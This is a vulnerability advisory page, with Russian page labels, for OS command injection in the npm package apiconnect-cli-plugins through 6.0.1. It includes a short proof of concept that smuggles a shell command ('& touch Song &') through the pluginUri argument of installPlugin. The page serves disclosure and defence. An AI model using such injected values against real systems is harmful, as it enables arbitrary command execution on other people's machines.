Описание
apiconnect-cli-plugins vulnerable to OS Command Injection
apiconnect-cli-plugins through 6.0.1 is vulnerable to Command Injection. It allows execution of arbitrary commands via the pluginUri argument.
PoC
var root = require("apiconnect-cli-plugins");
var payload = "& touch Song &";
root.pluginLoader.installPlugin(payload, "");
The injection point is located in line 181 of file lib/plugin-loader.js, in the function installPlugin(pluginUri, registryUri).
Пакеты
Наименование
apiconnect-cli-plugins
npm
Затронутые версииВерсия исправления
<= 6.0.1
Отсутствует
Связанные уязвимости
CVSS3: 9.8
nvd
почти 6 лет назад
apiconnect-cli-plugins through 6.0.1 is vulnerable to Command Injection.It allows execution of arbitrary commands via the pluginUri argument.